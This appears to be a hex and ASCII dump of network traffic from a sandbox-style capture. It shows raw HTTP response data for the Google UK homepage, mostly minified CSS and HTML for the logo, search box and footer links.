                                                                                                                                                                      2021-09-14 14:03:24 UTC80INData Raw: 74 6f 6d 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 5f 6c 64 20 2e 67 62 5f 6d 64 2c 2e 67 62 5f 6c 64 20 2e 67 62 5f 6e 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 62 37 64 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 33 29 2c 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 31 35 29 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 66 6f 63
                                                                                                                                                                      Data Ascii: tom:0;white-space:nowrap}.gb_ld .gb_md,.gb_ld .gb_nd{margin-left:12px;text-transform:none}a.gb_3.gb_md:hover{background-color:#2b7de9;border-color:transparent;box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}a.gb_3.gb_md:foc
                                                                                                                                                                      2021-09-14 14:03:24 UTC81INData Raw: 67 69 6e 3a 30 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 33 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 64 39 30 66 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 31 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 67 62 5f 63 64 20 61 2e 67 62 5f 33 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 52 6f 62 6f
                                                                                                                                                                      Data Ascii: gin:0}.gb_cd .gb_3c{background:#4d90fe;border:2px solid transparent;box-sizing:border-box;font-weight:500;margin-top:21px;min-width:70px;text-align:center}.gb_cd a.gb_3{background:#1a73e8;border-radius:4px;color:#ffffff;font-family:Google Sans,Roboto,Robo
                                                                                                                                                                      2021-09-14 14:03:24 UTC82INData Raw: 68 3a 34 38 70 78 7d 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 33 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 33 32 36 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 79 64 20 2e 67 62 5f 70 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 35 34 70 78 3b 77 69 64 74 68 3a 32 35 34 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 77 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 67 62 5f 42 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64
                                                                                                                                                                      Data Ascii: h:48px}.gb_pd{padding-left:13px;width:100%}.gb_cd .gb_pd{padding-top:4px;min-width:326px;padding-left:0px;width:326px}.gb_cd.gb_yd .gb_pd{min-width:254px;width:254px}.gb_cd.gb_wd .gb_pd{padding-top:32px}.gb_Bd{color:#ffffff;font-size:13px;font-weight:bold
                                                                                                                                                                      2021-09-14 14:03:24 UTC83INData Raw: 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73
                                                                                                                                                                      Data Ascii: r-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));background-image:-ms-linear-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));border:1px solid rgba(0,0,0,0.2);box-shadow:0 1px 1px rgba(0,0,0,0.1);filter:progid:DXImageTransform.Microsoft.gradient(startColors
                                                                                                                                                                      2021-09-14 14:03:24 UTC85INData Raw: 34 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 30 70 78 7d 2e 71 61 72 73 74 62 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 33 65 55 67 62 22 20 64 61 74 61 2d 68 76 65 69 64 3d 22 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 6e 31 78 4a 63 66 20 4e 65 36 6e 53 64 22 3e 3c 73 74 79 6c 65 3e 2e 4e 65 36 6e 53 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 36 70 78 7d 61 2e 4d 56 33 54 6e 62 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 61 2e 4d 56 33 54 6e 62 3a 66 69 72 73 74
                                                                                                                                                                      Data Ascii: 4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}a.MV3Tnb{display:inline-block;padding:5px;margin:0 5px;color:#222}a.MV3Tnb:first
                                                                                                                                                                      2021-09-14 14:03:24 UTC86INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 53 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 4e 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 42 20 67 62 5f 62 64 20 67 62 5f 68 20 67 62 5f 41 66 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 3d 22 74 72 75 65 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 3d 22 22 20 69 64 3d 22 67 62 77 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 7a 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 5f 43 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 6f 67 6c 65 20 61 70 70 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 22 20 61 72 69 61 2d 65 78 70 61 6e
                                                                                                                                                                      Data Ascii: div></div><div class="gb_Se"><div class="gb_Nc"><div class="gb_B gb_bd gb_h gb_Af" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_zf"><a class="gb_C" aria-label="Google apps" href="https://www.google.co.uk/intl/en/about/products" aria-expan
                                                                                                                                                                      2021-09-14 14:03:24 UTC87INData Raw: 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6b 31 7a 49 41 20 72 53 6b 34 73 65 22 3e 3c 73 74 79 6c 65 3e 2e 72 53 6b 34 73 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 39 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 6e 58 64 70 64 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 6e 74 61 69 6e 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 77 69 64 74 68 3a 61 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 6e 58 64 70 64 22 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61
                                                                                                                                                                      Data Ascii: uto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/bra
                                                                                                                                                                      2021-09-14 14:03:24 UTC89INData Raw: 6d 63 61 76 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 32 34 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 36 70 78 7d 2e 52 4e 4e 58 67 62 3a
                                                                                                                                                                      Data Ascii: mcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:
                                                                                                                                                                      2021-09-14 14:03:24 UTC90INData Raw: 73 74 79 6c 65 3e 2e 67 4c 46 79 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 37 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 30 30 25 3b 2d 6d 73 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 37 70 78 3b 68 65 69 67 68 74 3a 33 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 6d 69 6e 69 64 69 76 20 2e 67 4c 46 79 66 7b 6d 61 72 67 69 6e
                                                                                                                                                                      Data Ascii: style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;-ms-tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin
                                                                                                                                                                      2021-09-14 14:03:24 UTC91INData Raw: 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 2e 4d 32 76 56 33 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 45 78 43 4b 6b 66 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 6d 69 6e 69 64 69 76 20 2e 42 4b 52 50 65 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 45 78 43 4b 6b 66 7b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65
                                                                                                                                                                      Data Ascii: r;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style
                                                                                                                                                                      2021-09-14 14:03:24 UTC92INData Raw: 31 36 70 78 7d 2e 65 72 6b 76 51 65 7b 66 6c 65 78 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 7d 2e 52 6a 50 75 56 62 7b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 36 70 78 20 30 20 30 7d 2e 53 33 6e 46 6e 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 53 33 6e 46 6e 64 20 2e 52 6a 50 75 56 62 2c 2e 53 33 6e 46 6e 64 20 2e 61 61 6a 5a 43 62 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 6c 68 38 37 6b 65 3a 6c 69 6e 6b 2c 2e 6c 68 38 37 6b 65 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 31 61 30 64 61 62 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 3a 31 31 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                                                                                                                                                                      Data Ascii: 16px}.erkvQe{flex:auto;padding-bottom:8px;}.RjPuVb{height:1px;margin:0 26px 0 0}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-to
                                                                                                                                                                      2021-09-14 14:03:24 UTC94INData Raw: 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 20 30 20 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 20 38 70 78 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 79 6e 52 72 69 63 22 20 69 64 3d 22 79 6e 52 72 69 63 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 2f 6c 69 3e 3c 73 74 79 6c 65 3e 23 59 4d 58 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 62 63 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                                                                                                      Data Ascii: family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><li class="ynRric" id="ynRric" role="presentation"></li><style>#YMXe{display:none}.sbct{display:flex;align-it
                                                                                                                                                                      2021-09-14 14:03:24 UTC95INData Raw: 67 2d 74 6f 70 3a 30 7d 2e 6d 75 73 5f 69 6c 5f 61 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 6c 5f 73 74 7b 72 69 67 68 74 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6d 75 73 5f 69 6c 5f 69 7b 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 74 33 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 2e 6d 75 73 5f 69 74 35 7b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67
                                                                                                                                                                      Data Ascii: g-top:0}.mus_il_at{margin-left:10px}.mus_il_st{right:52px;position:absolute}.mus_il_i{align:left;margin-right:10px}.mus_it3{margin-bottom:3px;max-height:24px;vertical-align:bottom}.mus_it5{height:24px;width:24px;vertical-align:bottom;margin-left:10px;marg
                                                                                                                                                                      2021-09-14 14:03:24 UTC96INData Raw: 70 6f 69 6e 74 65 72 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 32 38 35 66 34 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 20 3c 63 65 6e 74 65 72 3e 20 3c 69 6e 70
                                                                                                                                                                      Data Ascii: pointer;user-select:none}.lJ9FBc input[type="submit"]:hover{box-shadow:0 1px 1px rgba(0,0,0,.1);background-color:#f8f9fa;border:1px solid #dadce0;color:#202124}.lJ9FBc input[type="submit"]:focus{border:1px solid #4285f4;outline:none}</style> <center> <inp
                                                                                                                                                                      2021-09-14 14:03:24 UTC97INData Raw: 65 72 3d 22 45 6b 65 76 58 62 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 6a 73 61 63 74 69 6f 6e 3d 22 72 63 75 51 36 62 3a 6e 70 54 32 6d 64 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 64 75 66 33 2d 34 36 22 20 64 61 74 61 2d 6a 69 69 73 3d 22 75 70 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 74 79 70 65 3d 22 64 75 66 66 79 33 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 63 6f 6e 74 65 78 74 2d 72 65 71 75 69 72 65 64 3d 22 74 79 70 65 2c 6f 70 65 6e 2c 66 65 61 74 75 72 65 5f 69 64 2c 61 73 79 6e 63 5f 69 64 2c 65 6e 74 72 79 5f 70 6f 69 6e 74 2c 61 75 74 68 6f 72 69 74 79 2c 63 61 72 64 5f 69 64 2c 66 74 6f 65 2c 74 69 74 6c 65 2c 68 65 61 64 65 72 2c 73 75 67 67 65 73 74 69 6f 6e 73 2c 73 75 72 66 61 63 65 2c 73 75 67 67 65 73
                                                                                                                                                                      Data Ascii: er="EkevXb" style="display:none" jsaction="rcuQ6b:npT2md"></div><div id="duf3-46" data-jiis="up" data-async-type="duffy3" data-async-context-required="type,open,feature_id,async_id,entry_point,authority,card_id,ftoe,title,header,suggestions,surface,sugges
                                                                                                                                                                      2021-09-14 14:03:24 UTC99INData Raw: 6d 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 71 61 72 73 74 62 22 3e 3c 73 74 79 6c 65 3e 2e 76 63 56 5a 37 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 63 39 33 47 62 65 22 3e 3c 73 74 79 6c 65 3e 2e 63 39 33 47 62 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 32 66 32 66 32 7d 2e 75 55 37 64 4a 62 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 7d 2e 53 53 77 6a 49 65 7b 70 61 64 64 69 6e 67 3a 30 20 32
                                                                                                                                                                      Data Ascii: m></div><div class="o3j99 qarstb"><style>.vcVZ7d{text-align:center}</style></div><div class="o3j99 c93Gbe"><style>.c93Gbe{background:#f2f2f2}.uU7dJb{padding:15px 30px;border-bottom:1px solid #dadce0;font-size:15px;color:rgba(0,0,0,.54)}.SSwjIe{padding:0 2
                                                                                                                                                                      2021-09-14 14:03:24 UTC100INData Raw: 4c 63 30 50 37 79 41 68 57 4e 33 4b 51 4b 48 52 6c 58 42 7a 73 51 6b 64 51 43 43 41 34 27 2c 27 27 2c 27 27 2c 65 76 65 6e 74 29 22 3e 41 64 76 65 72 74 69 73 69 6e 67 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 3f 73 75 62 69 64 3d 77 77 2d 77 77 2d 65 74 2d 67 2d 61 77 61 2d 61 2d 67 5f 68 70 62 66 6f 6f 74 31 5f 31 21 6f 32 26 61 6d 70 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 67 6f 6f 67 6c 65 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 67 6f 6f 67 6c 65 5f 68 70 62 66 6f 6f 74 65 72 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73
                                                                                                                                                                      Data Ascii: Lc0P7yAhWN3KQKHRlXBzsQkdQCCA4','','',event)">Advertising</a><a class="pHiOh" href="https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&amp;utm_source=google.com&amp;utm_medium=referral&amp;utm_campaign=google_hpbfooter&amp;fg=1" onmous
                                                                                                                                                                      2021-09-14 14:03:24 UTC101INData Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6b 74 4c 4b 69 22 3e 43 61 72 62 6f 6e 20 6e 65 75 74 72 61 6c 20 73 69 6e 63 65 20 32 30 30 37 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 78 77 50 47 63 20 69 54 6a 78 6b 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 69 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 69 76 61 63 79 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73 65 64 6f 77 6e 3d 22 72 65 74 75 72 6e 20 72 77 74 28 74 68 69 73 2c 27 27 2c 27 27 2c 27 27 2c 27 27 2c 27 41 4f 76 56 61 77 31 66 33 6f 2d 33 69 67 46 77 46 75 72 68 6e 6d 77 49 76 45 30 33 27 2c 27 27 2c 27 30 61 68 55 4b 45 77 69 4e 73 61 4c 63
                                                                                                                                                                      Data Ascii: span class="ktLKi">Carbon neutral since 2007</span></a></div><div class="KxwPGc iTjxkf"><a class="pHiOh" href="https://policies.google.com/privacy?hl=en-GB&amp;fg=1" onmousedown="return rwt(this,'','','','','AOvVaw1f3o-3igFwFurhnmwIvE03','','0ahUKEwiNsaLc
                                                                                                                                                                      2021-09-14 14:03:24 UTC103INData Raw: 70 6e 66 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 20 6a 73 61 63 74 69 6f 6e 3d 22 6b 65 79 64 6f 77 6e 3a 4f 45 58 43 33 63 3b 66 6f 63 75 73 6f 75 74 3a 59 34 38 70 56 62 22 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 2f 61 64 76 61 6e 63 65 64 5f
                                                                                                                                                                      Data Ascii: pnf" role="menu" jsaction="keydown:OEXC3c;focusout:Y48pVb"><li role="none"><a class="EzVRq" href="https://www.google.com/preferences?hl=en-GB&amp;fg=1" role="menuitem" tabindex="-1">Search settings</a></li><li role="none"><a class="EzVRq" href="/advanced_
